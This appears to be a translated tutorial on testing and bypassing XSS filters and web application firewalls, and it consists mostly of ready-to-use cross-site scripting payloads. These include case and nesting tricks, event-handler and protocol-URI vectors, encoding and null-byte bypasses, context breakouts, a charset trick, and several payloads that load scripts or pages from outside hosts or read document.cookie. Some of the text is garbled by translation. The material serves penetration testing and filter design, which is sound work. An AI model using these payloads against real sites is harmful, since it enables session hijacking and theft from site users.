Test Method for Bypass xss Filtering

0x00 background
 

This article is from the bypass XSS filtering section in Modern Web Application firewils Fingerprinting and Bypassing xss Filters. The previous test method for determining which WAF is based on WAF features is skipped, let's take a look at some basic test procedures for xss. Although WAF is used, the test method is bypassed based on the regular expression defects in waf, which is not a protocol issue, therefore, it can be used in other xss filtering scenarios. This helps new users quickly learn some basic methods for testing xss.

 

0x01 Bypassing blacklist

In most places, the blacklist is used as the filter. There are three ways to bypass the blacklist test:

1. brute-force testing (input a large amount of payload to see the returned results) 2. calculate based on regular expressions 3. Use browser bugs

Preliminary Test

1) Try to insert a normal HTML Tag, for example, <B>, <I>, <u> to check whether the returned page is HTML encoded, or the tag is filtered out.

2) Try to insert a non-closed tag, for example, <B, <I, <u, <marquee, and check whether the returned response is filtered out for the opened tag.

3) then test several XSS payloads. Basically all xss filters will be filtered:

<script>alert(1);</script><script>prompt(1);</script><script>confirm(1);</script><scriptsrc="http://rhainfosec.com/evil.js">

Check whether all the returned responses are filtered, or only some are filtered, whether alert, prompt, and confirm characters are left, and try a combination of upper and lower cases:

<scRiPt>alert(1);</scrIPt>

4) if the filter only filters out the <script> and </script> tags, you can use

<scr<script>ipt>alert(1)</scr<script>ipt>

In this way, when the <script> tag is filtered out, the remaining combinations form a complete payload.

5) use the <a href label to test the response.

<a href="http://www.google.com">Clickme</a>

<A tag is filtered out
Whether href is filtered
Whether the data in href is filtered

If no data is filtered, insert the javascript protocol:

<a href="javascript：alert(1)">Clickme</a>

Error returned?
Whether the entire javascript protocol content is filtered out or only javascript characters are filtered out
Try case-insensitive Conversion

Continue Test Event trigger execution javascript:

<a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a>

Check whether the onmouseover event is filtered. Test an invalid event and check the filtering rules:

<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>

Is it a complete response, or is it killed like onmouseover.

If it is a complete response, it means that the event blacklist is implemented, but in HTML5, there are more than 150 ways to execute javascript code to test events that are rare:

<body/onhashchange=alert(1)><a href=#>clickit

Test other labels

Next, test other labels and attributes.

Src Properties

 <video src=x onerror=prompt(1);><audio src=x onerror=prompt(1);>

Iframe tag

<iframe src="javascript：alert(2)"><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

Embed label

<embed/src=//goo.gl/nlX0P>

Action property

Use the action attribute in the <form, <isindex, and other labels to execute javascript

<form action="Javascript:alert(1)"><input type=submit><isindex action="javascript：alert(1)" type=image><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image><isindex action=data:text/html, type=image><formaction='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK

Formaction attributes

<isindexformaction="javascript：alert(1)" type=image><input type="image" formaction=JaVaScript:alert(0)><form><button formaction=javascript&colon;alert(1)>CLICKME

Background attributes

<Table background = javascript: alert (1)> </table> // valid for Opera 10.5 and IE6

Poster attributes

<Video poster = javascript: alert (1) //> </video> // Opera 10.5 or lower is valid

Data attributes

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="><object/data=//goo.gl/nlX0P?

Code attributes

<Applet code = "javascript: confirm (document. cookie);"> // Firefox valid <embed code = "http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>

Event triggering

<svg/onload=prompt(1);><marquee/onstart=confirm(2)>/<body onload=prompt(1);><select autofocus onfocus=alert(1)><textarea autofocus onfocus=alert(1)><keygen autofocus onfocus=alert(1)><video><source onerror="javascript：alert(1)">

Shortest Vector

<Q/oncut = open ()> <q/oncut = alert (1)> // It is effective in the restricted length.

Nesting

<Marquee/onstart = confirm (2)>/onstart = confirm (1)> <bodylanguage = vbsonload = alert-1 // IE8 valid <command onmouseover = "\ x6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ cross 7 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ cross \ x61 \ x72 \ x3B "> Save </command> // IE8 is valid

When parentheses are filtered

When parentheses are filtered, throw can be used to bypass

<a onmouseover="javascript：window.onerror=alert;throw 1>

The preceding two test vectors have an "uncaught" error on Chrome and IE. You can use the following vectors:

<body/onload=javascript：window.onerror=eval;throw'=alert\x281\x29';>

Expression attribute

 // <div style = "color: rgb ('' & #0; x: expression (alert (1) "> </div> // IE7 <style >#test {x: expression (alert (/XSS /))} </style> // IE7 or lower

Location Property

<a onmouseover=location='javascript：alert(1)'>click<body onfocus="loaction='javascript：alert(1)'">123

Other payload

<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript：\u0061lert(1);"></g></svg><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript：alert(1)" begin="0s" dur="0.1s" fill="freeze"/><svg><![CDATA[><imagexlink:href="]]></svg><meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/><math><a xlink:href="//jsfiddle.net/t846h/">click

When = ();: is filtered

<Svg> <script> alert & #40/1/& #41 </script> // kill all browsers

It can not be closed in opera

<Svg> <script> alert & #40 1 & #41 // Opera queryable

Entity Encoding

In many cases, WAF encodes user input data,

Javascript is a flexible language and can use many encodings, such as hexadecimal, Unicode, and HTML. However, there are also rules on the location where these codes can be used:

Attribute:

href=action=formaction=location=on*=name=background=poster=src=code=

Supported encoding methods: HTML, octal, decimal, hexadecimal, and Unicode

Attribute:

data=

Supported encoding: base64

Context-Based Filtering

The biggest problem with WAF is that it does not know the context of the output location, so it can be bypassed according to the specific environment.

Input in attribute

<input value="XSStest" type=text>

The controllable location is XSStest, which can be used

">

If it is filtered, you can replace it

" autofocusonfocus=alert(1)//

There are also many other payloads:

"onmouseover="prompt(0)x=""onfocusin=alert(1)autofocusx="" onfocusout=alert(1) autofocus x=""onblur=alert(1)autofocusa="

Input in script tag

For example:

<script>Var x="Input";</script>

The controllable position is in Input. You can close the script tag and insert code, but we can only close the double quotation marks to execute js Code.

";alert(1)//

The final result is

<script>Var x="";alert(1)//</script>

Unconventional event listening

For example:

";document.body.addEventListener("DOMActivate",alert(1))//";document.body.addEventListener("DOMActivate",prompt(1))//";document.body.addEventListener("DOMActivate",confirm(1))//

The following are some of the same classes:

DOMAttrModifiedDOMCharacterDataModifiedDOMFocusInDOMFocusOutDOMMouseScrollDOMNodeInsertedDOMNodeInsertedIntoDocumentDOMNodeRemovedDOMNodeRemovedFromDocumentDOMSubtreeModified

HREF controllable content

For example:

<a href="Userinput">Click</a>

What is controllable is Userinput. All we need to do is to input javascript code:

javascript：alert(1)//

The final combination is:

<a href="javascript：alert(1)//">Click</a>

Transform

If you use HTML object URL encoding to bypass the blacklist, The href will automatically decode the object. If all failed, you can try to use vbscript to be valid for IE10 or earlier, or use the data protocol.

JavaScript Transformation

Examples used when using the javascript protocol:

javascript:alert(1)javaSCRIPT:alert(1)JaVaScRipT:alert(1)javas	cript:\u0061lert(1);javascript：\u0061lert(1&#x29javascript:alert(document.cookie)

Vbscript Transformation

vbscript:alert(1);vbscript:alert(1);vbscr	ipt:alert(1)"Data URldata:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

JSON

When your input is displayed in encodeURIComponent, it is easy to insert xss code.

encodeURIComponent('userinput')

The userinput field is controllable. Test code:

-alert(1)--prompt(1)--confirm(1)-

Final result:

encodeURIComponent("-alert(1)-")encodeURIComponent("-prompt(1)-")

SVG labels

When the returned result is in the svg tag, it has a feature.

<svg><script>varmyvar="YourInput";</script></svg>

YourInput is controllable.

www.site.com/test.php?var=text";alert(1)//

If you encode some codes, he can still execute:

<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>

Browser bug

Character Set bugs have appeared many times in IE, and the first is the UTF-7, but this is only available in earlier versions, and now we are discussing a javascript that can be executed in today's browsers.

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

On this page, we can control the character set of the current page. When we perform regular tests:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=">

The double quotation marks are encoded in the returned results:

Set character set to UTF-32:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
The above version can be successfully executed in IE9 and earlier versions.
Bypass with 0 bytes:
<scri%00pt>alert(1);</scri%00pt><scri\x00pt>alert(1);</scri%00pt><s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
Valid in IE9 and earlier versions.
For other browser features such as XSS, refer to the following articles:
Http://drops.wooyun.org/tips/147
0x02 Summary
This article is mainly a train of thought process for testing XSS. It does not fully write all the payloads. In fact, no one can write them completely. It just lists a general framework, in the process of searching, you can gradually add your own payload Based on this idea. Surely, there will be great progress.